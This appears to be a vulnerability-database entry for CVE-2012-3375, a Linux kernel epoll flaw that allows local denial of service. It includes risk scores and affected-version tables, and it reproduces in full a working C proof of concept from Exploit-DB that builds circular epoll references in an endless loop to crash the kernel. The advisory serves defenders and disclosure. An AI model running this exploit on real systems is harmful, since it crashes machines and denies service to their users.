CVE-2012-3375

medium

Published 2012-10-03 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.9

Description

The epoll_ctl system call in fs/eventpoll.c in the Linux kernel before 3.2.24 does not properly handle ELOOP errors in EPOLL_CTL_ADD operations, which allows local users to cause a denial of service (file-descriptor consumption and system crash) via a crafted application that attempts to create a circular epoll dependency. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1083.

Predictions

Exploit likelihood

55%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-19605 dos linux verified c · 2 KB

Yurij M. Plotnikov · 2012-07-05

Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service

c exploit Source: Exploit-DB

/*
The Linux Kernel is prone to a local denial-of-service vulnerability. 

Successful exploits will allow attackers to cause the kernel to crash, denying service to legitimate users.
*/


#include <netinet/in.h>
#include <sys/epoll.h>
#include <errno.h>

int
main ()
{
    struct sockaddr_in addr;
    struct epoll_event event;
    int epfd1, epfd2, sock;
    int rc;
    int i = 0;
    while (1)
    {
        printf("ITERATION %d\n", ++i);
        epfd1 = epoll_create(1);
        printf("epoll_create() -> %d(%d)\n", epfd1, errno);
        epfd2 = epoll_create(1);
        printf("epoll_create() -> %d(%d)\n", epfd2, errno);

        sock = socket(PF_INET, SOCK_STREAM, 0);
        printf("socket() -> %d(%d)\n", sock, errno);

        addr.sin_family = AF_INET;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = 0;
        rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr));
        printf("bind() -> %d(%d)\n", rc, errno);

        rc = listen(sock, 1);
        printf("listen() -> %d(%d)\n", rc, errno);

        event.data.fd = sock;
        event.events = 0;
        rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);

        event.data.fd = epfd2;
        event.events = EPOLLIN;
        rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);

        event.data.fd = epfd1;
        event.events = EPOLLIN;
        rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event);
        printf("epoll_ctl() -> %d(%d)\n", rc, errno);

        rc = close(epfd1);
        printf("close(epfd1) -> %d(%d)\n", rc, errno);

        rc = close(epfd2);
        printf("close(epfd2) -> %d(%d)\n", rc, errno);

        rc = close(sock);
        printf("close(sock) -> %d(%d)\n", rc, errno);

        sleep(1);
        printf("\n\n");
    }
    return 0;
}

OS impact

Linux kernel Affected 67 releases

Version	Status	Fixed in
3.2.22	Affected	—
3.2.21	Affected	—
3.2.20	Affected	—
3.2.19	Affected	—
3.2.18	Affected	—
3.2.17	Affected	—
3.2.16	Affected	—
3.2.15	Affected	—
3.2.14	Affected	—
3.2.13	Affected	—
3.2.12	Affected	—
3.2.11	Affected	—
3.2.10	Affected	—
3.2.9	Affected	—
3.2.8	Affected	—
3.2.7	Affected	—
3.2.6	Affected	—
3.2.5	Affected	—
3.2.4	Affected	—
3.2.3	Affected	—
3.2.2	Affected	—
3.2.1	Affected	—
3.1.10	Affected	—
3.1.9	Affected	—
3.1.8	Affected	—
3.1.7	Affected	—
3.1.6	Affected	—
3.1.5	Affected	—
3.1.4	Affected	—
3.1.3	Affected	—
3.1.2	Affected	—
3.1.1	Affected	—
3.0.34	Affected	—
3.0.33	Affected	—
3.0.32	Affected	—
3.0.31	Affected	—
3.0.30	Affected	—
3.0.29	Affected	—
3.0.28	Affected	—
3.0.27	Affected	—
3.0.26	Affected	—
3.0.25	Affected	—
3.0.24	Affected	—
3.0.23	Affected	—
3.0.22	Affected	—
3.0.21	Affected	—
3.0.20	Affected	—
3.0.19	Affected	—
3.0.18	Affected	—
3.0.17	Affected	—
3.0.16	Affected	—
3.0.15	Affected	—
3.0.14	Affected	—
3.0.13	Affected	—
3.0.12	Affected	—
3.0.11	Affected	—
3.0.10	Affected	—
3.0.9	Affected	—
3.0.8	Affected	—
3.0.7	Affected	—
3.0.6	Affected	—
3.0.5	Affected	—
3.0.4	Affected	—
3.0.3	Affected	—
3.0.2	Affected	—
3.0.1	Affected	—
—	Affected	—

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`3.2.23-1`
sid	Fixed	`3.2.23-1`
forky	Fixed	`3.2.23-1`
bullseye	Fixed	`3.2.23-1`
bookworm	Fixed	`3.2.23-1`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.